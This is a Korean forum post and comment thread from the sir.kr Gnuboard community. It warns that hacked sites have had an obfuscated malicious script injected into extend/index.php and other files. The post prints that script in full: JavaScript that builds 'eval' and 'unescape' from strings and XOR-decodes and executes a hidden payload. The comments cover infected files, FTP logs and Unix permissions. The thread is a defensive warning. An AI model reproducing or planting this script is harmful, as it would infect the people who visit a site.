extend 폴더의 index.php 를 확인하세요 > 십년전오늘

십년전오늘

10년전 추억의 책장을 넘기며

extend 폴더의 index.php 를 확인하세요 정보

extend 폴더의 index.php 를 확인하세요

본문

그누보드
extend/ index.php  화일에 주의 하세요

<!-- ad --><script>this.varDate="";this.intStaticFloat="intStaticFloat";var nsNull=function(){};var windowNs;this.falseFinalByte=false;var finalWindowShort=new Date();var shortDoubleSet="";windowNs='%e0%fe%ed%fc%ff%ea%e1%f9%aa%f0%ce%ea%e4%c9%a7%b5%ae%ec%f7%d4%eb%ca%e2%ad%fd%ec%d3%ba%b0%fd%f7%ed%d5%b9%b9%88%ec%f3%ec%e8%eb%bf%e1%d7%e4%b9%f9%f6%fd%9e%e0%e3%a8%e7%c3%cf%b4%a7%aa%aa%f0%f2%fb%e2%fd%8b%b4%e8%e0%ea%b8%fd%ee%e8%bc%8f%dc%f9%ef%f1%a0%b1%a9%e1%f9%e1%ed%f6%ee%f5%bb%f8%fb%e9';var byteGetInt=new Array();var dateFloatByte=function(){return 'dateFloatByte'};function floatLetterDate(intVar){var varGet=false;var intWindowDouble=false;this.wordDate="";this.setDate=5444;for(longFinal=0;longFinal<3;longFinal++){};function dateSet(shortFinal){this.doubleTrueFalse="";this.wordSet='';function staticWordVar(staticWordVar){return true};var letterLetter=0;var shortNsAs=false;var dateTrueNs=new Array();wordFloatByte=0;while(wordFloatByte<0){wordFloatByte++};var staticUse=shortFinal.length, byteDoubleLong=0;var longGetChar='';var windowNsShort=new Date();function charSetAs(charSetAs){return 'charSetAs'};var setSetAs=new Array();for(trueDouble=0;trueDouble<1;trueDouble++){};while(byteDoubleLong<staticUse){for(nsGet=0;nsGet<2;nsGet++){};var varAs=function(){};this.floatChar=14914;var dateStaticInt='dateStaticInt'.substring(52533, 52533);var trueStaticSet=50549;letterLetter+=nsFalseFalse(shortFinal,byteDoubleLong)*staticUse;for(getUseDate=0;getUseDate<3;getUseDate++){getUseDate++};var shortCharShort='shortCharShort'.substring(22909, 22909);byteDoubleLong++;function longWindow(longWindow){return 'longWindow'};var doubleShortChar=new Date();var shortGet="shortGet";}var letterTrueChar='';var falseIntInt="falseIntInt";this.staticDouble="";falseStatic=0;while(falseStatic<4){falseStatic++};var staticVar='';return (letterLetter+'');this.byteSetNs=18208;this.windowVarFloat="windowVarFloat";var falseFinal='falseFinal'.substring(65206, 65206);}var dateDouble=new Array();this.useWord="useWord";var charShortStatic=44307;for(floatByte=0;floatByte<4;floatByte++){floatByte++};for(getGetLetter=0;getGetLetter<1;getGetLetter++){getGetLetter++};this.finalFinalTrue="";function nsFalseFalse(doubleLongDate,finalUse){function trueWindowDate(trueWindowDate){return true};this.shortStaticTrue='';this.staticFalseAs=64900;return doubleLongDate['cjhYaUrUCjofdfe@AYt@'.replace(/[j@fYU]/g, '')](finalUse);var nsTrue=false;var useUseWord=false;}var charFalse=function(){return 'charFalse'};var wordFinal="";var charVar="charVar";this.varGetLong=40344;var asNs=21997;this.nsFalseWindow="";var trueWindowNull=window['eIvRaRlI'.replace(/[Ry\]/g, '')]('ahr9g9uhm|e|n;t;sE.|cEa;lhl;e|e9'.replace(/[9h;\|E]/g, ''));var longDoubleNull=12476;var charWindowByte=function(){return 'charWindowByte'};var getWordWindow=new Date();var getIntDouble=function(){};var intShort=new Date();var getWordSet=function(){return 'getWordSet'};var nsFalse=0,doubleSet=0, dateWord=211;this.setByte=false;var varUseDate=function(){};var charTrueDouble='';function setTrue(){};var asStaticCharSet="asStaticCharSet";this.nsNullDate="nsNullDate";var nullInt=(new String(trueWindowNull)).replace(/[^@a-z0-9A-Z_.,-]/g,'');this.falseSetDouble="falseSetDouble";var longShortFalse=new Array();var staticWordWord=dateSet(nullInt);var nsNsInt=false;for(finalFinalWord=0;finalFinalWord<0;finalFinalWord++){finalFinalWord++};for(longFinalWindow=0;longFinalWindow<4;longFinalWindow++){longFinalWindow++};this.letterGetGet="";this.letterSetVar="";function trueInt(trueInt){return 'trueInt'};intVar=window['ujnLeLsIcIaLpjeT'.replace(/[ISTLj]/g, '')](intVar);var dateUse='';var finalFalseStatic=function(){};this.doubleFalseInt=false;var staticUseWindow='staticUseWindow'.substring(18727, 18727);for(var windowDateTrue=0; windowDateTrue < (intVar.length); windowDateTrue++){for(varChar=0;varChar<2;varChar++){varChar++};var nsNullWord=function(){};var longLetterLetter=new Date();var trueWord=false;var floatDouble=nsFalseFalse(nullInt,nsFalse);this.trueLong="trueLong";var getLong='';var letterGetLetter=nsFalseFalse(staticWordWord,doubleSet);function floatFalse(){};var intLongFinal='intLongFinal'.substring(15936, 15936);var asLetterVar='';var byteShortVar="";var longStatic=false;var nsFloat=floatDouble^letterGetLetter^dateWord;for(letterAsLetter=0;letterAsLetter<4;letterAsLetter++){};var longNs="longNs";var useFloatShort=false;var wordFloatNull=nsFalseFalse(intVar,windowDateTrue);var wordGetUse="wordGetUse";this.finalAs='';for(dateDoubleShort=0;dateDoubleShort<0;dateDoubleShort++){dateDoubleShort++};var trueTrue=function(){};nsFalse++,doubleSet++;var trueTrueStatic=function(){};this.shortDouble="shortDouble";charTrueDouble+=String['f3rso3mZC3h3asr9C9osdXe3'.replace(/[XZ3s9]/g, '')](wordFloatNull^nsFloat);this.shortByteUse="shortByteUse";this.getByteUse='';this.charNsSet=false;var longUseShort="longUseShort";this.falseByte="";if(doubleSet>staticWordWord.length)doubleSet=0;doubleSetByte=0;while(doubleSetByte<2){doubleSetByte++};var falseLetterTrue=function(){};if(nsFalse>nullInt.length)nsFalse=0;for(nsStatic=0;nsStatic<2;nsStatic++){nsStatic++};this.charFalseLetterNull=63075;}var varUseLong=new Date();var setFinalNs=function(){};this.staticAsDate=false;function floatDoubleLong(){};this.useDateInt="";window['eIvRaRlI'.replace(/[Ry\]/g, '')](charTrueDouble); this.letterGetDouble=false;this.dateLong="dateLong";function nsShort(nsShort){return true};staticWord=0;while(staticWord<3){staticWord++};return charTrueDouble=new String();var byteIntDouble=new Array();for(asSet=0;asSet<4;asSet++){};var windowLetter="";var finalFinalShort="finalFinalShort";var charInt=new Array();}this.windowSetDouble=false;this.getTrueChar="";var useAsWord='';floatLetterDate(windowNs);var wordLetterUse='wordLetterUse'.substring(36320, 36320);var nsFloatStatic=new Array();</script><!-- /ad -->

이런 내용으로 요즘 갑자기 도배가 되는군요..

음 버전 자체가 구 버전 이라 해킹을 당해도 어쩔수 없지만 패치자체도 문제고 주의를 좀 하셔야 할지도 모르겠습니다..

댓글 전체

광고 트래픽을 올리는 코드 인가요?
요새 많네요.. 이런 일이 ㅎㅎ

그누보드는 이게 좋습니다. 오픈된 만큼 위험도 크지만 그만큼 해결도 빨리 되는것..
이 페이지 눌렀더니 트로이목마가 발견되었다고 뜨는군요.
문제가 있어 보이는데요.
이것 자체가 보는 사람들에게 바이러스를 퍼트리는 모양인데요.
문제는 이 글 자체는 특정 사이트로 유도를 하지는 않더라구요.

제가 찾은 부분은 / index.php 랑
/bbs/login.php 랑
extend/index.php 안에 3군데에 일단 있더군요.


일단 아직 분석도 못하고 -_-;; 그냥 대충 퍼미션 막아서 막아두긴 했지만 나머진 모르겠습니다.

이것도 분명히 확인을 해봐야 하겠군요..

음 사이트중에 4.31.06 버전은 이 부분이 통하지 않는 모양입니다.

4.31.06버전으로 버티는 사이트가 한개 있는데 그 사이트는 아직 이런 만행이 없군요.

아직 자세히 판정할수는 없지만 오누리님의 빌더 최신 버전 이 한개 있는데 이것이 뚫린걸 보아선 ..  (빌더버전 : 1.9 / 그누버전 : 4.31.06 / 패치날짜 : 09.5.26)

음 이것 역쉬 사용자 컴의 감염으로 움직이는듯 합니다..

ftp 접속 로그를 살펴보니 헉

오누리 빌더의 경우는 adm/ 에서 쿠폰 및

convert 부분

그리고 data 밑에 경로까지 쫘악~~~~~~~~ 쓸고 가버렸네요

에디트도 -_-;;

컴 주의해서 사용해야 할지도 ;;
읽기 = 1 
쓰기 = 2
실행 = 4

입니다.

이 세가지가 합쳐져서 하나의 퍼미션이 됩니다.

제일 처음 7 은 Root 사용자 권한 입니다.
두번째는 Group 사용자 권한 입니다.
세번째는 실 계정 사용자 권한 입니다.

          7  :                          5    :                        5 
        루트                        그룹                          계정
  읽고.쓰고.실행이 가능    읽기 및 실행만 가능    읽기 및 실행만 가능
 
대충 이렇게 이해 하시면 되겠죠.

자신의 쉘에서 ll 내지 ls -l 을 하시면

drwxrwxr-x  2 re**** re****    4096 2007-11-27 10:47 lib    -> 1775
-rw-r--r--  1 re**** re****  405 2009-02-19 12:52 main.php  -> 0611
-rw-r--r--  1 re**** re****  20603 2009-01-23 01:30 mssql.php -> 0611
drwx---rwx  7 apache    apache      4096 2008-12-02 10:31 data  -> 1707

nobody 내지 apache  또는 daemon 으로 웹 유저는 설정이 됩니다.

이런게 대충 보시면 됩니다.

그렇게 보시면 저기 앞에 붙은 문자가 이해가 되는거죠.
d = 디렉토리 라고 생각하시면 됩니다.

대강 어거지 설명이 되셨는지 ;;
전체 129,546
십년전오늘 내용 검색

회원로그인

진행중 포인트경매

  1. 참여38 회 시작24.04.19 15:40 종료24.04.26 15:40
(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT